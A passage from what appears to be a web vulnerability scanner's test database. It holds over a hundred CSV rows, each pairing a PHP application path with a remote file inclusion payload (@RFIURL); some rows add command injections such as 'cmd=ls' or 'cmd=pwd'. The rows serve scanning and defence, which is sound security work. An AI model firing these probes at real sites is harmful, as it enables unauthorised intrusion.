list.\",\"\",\"\"\n\"005844\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/help.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005845\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005846\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005847\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005848\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/mail.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005849\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/misc/new_day.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005850\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/news.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005851\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/post.php?fil_config=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005852\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/template.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005853\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/tourney/index.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005854\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/spaw/spaw_control.class.php?GLOBALS[spaw_root]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005855\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005856\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005857\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005858\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005859\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005860\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005861\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005862\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005863\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/spellcheckwindowframeset.php?SpellIncPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005864\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/squirrelcart/cart_content.php?cart_isp_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005865\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/src/ark_inc.php?cfg_pear_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005866\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005867\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/src/scripture.php?pageHeaderFile=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005868\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/starnet/themes/c-sky/main.inc.php?cmsdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005869\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/start.php?lang=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005870\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/start.php?pg=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005871\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/stat_modules/users_age/module.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005872\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/stats.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005873\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/stats.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005874\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/stphpapplication.php?STPHPLIB_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005875\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/stphpbtnimage.php?STPHPLIB_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005876\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/stphpform.php?STPHPLIB_DIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005877\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/str.php?p=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005878\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005879\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005880\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/strload.php?LangFile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005881\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005882\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005883\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/styles.php?toroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005884\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/styles/default/global_header.php?installed=23&domain=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005885\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/submit_abuse.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005886\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/submit_comment.php?path_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005887\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/subscp.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005888\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/suite/index.php?pg=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005889\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/suite/index.php?pg=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005890\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_auth_cookies.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005891\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_mods.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005892\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_news.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005893\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_settings.php?supa[include_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005894\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_topics.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005895\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_users.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005896\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/admin_utilities.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005897\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/backend_site.php?supa[include_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005898\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/common_functions.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005899\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/site_comment.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005900\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/supasite/site_news.php?supa[db_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005901\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/support/include/open_form.php?include_dir=@RFIURL?cmd=pwd\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005902\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/support/index.php?main=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005903\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/surveys/survey.inc.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005904\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_comment/comment.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005905\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_find/find.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005906\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_session/session.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005907\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_up_file/file.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005908\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_up_file/find_file.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005909\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_user/find_user.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005910\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sw/lib_user/user.php?doc_directory=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005911\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sys/code/box.inc.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005912\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/ImageImageMagick.php?glConf[path_system]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005913\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/ImageImageMagick.php?glConf[path_system]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005914\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/_b/contentFiles/gBIndex.php?gBRootPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005915\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/admin/include/item_main.php?GLOBALS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005916\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/admin/include/upload_form.php?GLOBALS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005917\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/command/admin.cmd.php?GLOBALS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005918\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/command/download.cmd.php?GLOBALS=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005919\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/funcs/xkurl.php?PEARPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005920\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/includes/pageheaderdefault.inc.php?_sysSessionPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005921\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/system/login.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005922\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/tagit2b/tagmin/delTagUser.php?configpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005923\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/tags.php?BBCodeFile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005924\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/taxonservice.php?dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005925\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/teatro/pub/pub08_comments.php?basePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005926\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005927\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template.php?actionsPage=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005928\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template.php?blog_theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005929\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template.php?pagina=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005930\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/Noir/index.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005931\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/Vert/index.php?pageAll=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005932\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/Vert/index.php?site_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005933\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/barnraiser_01/p_new_password.tpl.php?templatePath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005934\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/default/footer.php?ROOT_PATH=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005935\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/default/test/header.php?ROOT_PATH=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005936\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/gwb/user_bottom.php?config[template_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005937\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/purpletech/base_include.php?page=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005938\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/rwb/user_bottom.php?config[template_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005939\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template/rwb/user_bottom.php?config[template_path]=@RFIURL?&cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005940\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/template_csv.php?rInfo[content]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005941\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/2blue/bodyTemplate.php?serverPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005942\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/2blue/bodyTemplate.php?serverPath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005943\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/Official/part_userprofile.php?template_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005944\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/barrel/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005945\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/barrel/template.tpl.php?renderer=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005946\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/barry/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005947\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/be2004-2/index.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005948\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/datumVonDatumBis.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005949\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/default/header.inc.php?menu=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005950\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/default/index_logged.php?main_loaded=1&cur_module=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005951\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/default/tpl_message.php?right_file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005952\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/footer.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005953\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/header.inc.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005954\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/mylook/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005955\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/oerdec/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005956\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/pb/language/lang_nl.php?temppath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005957\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/penguin/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005958\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/sidebar/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005959\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/slashdot/template.tpl.php?renderer=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005960\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/templates/stylesheets.php?root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 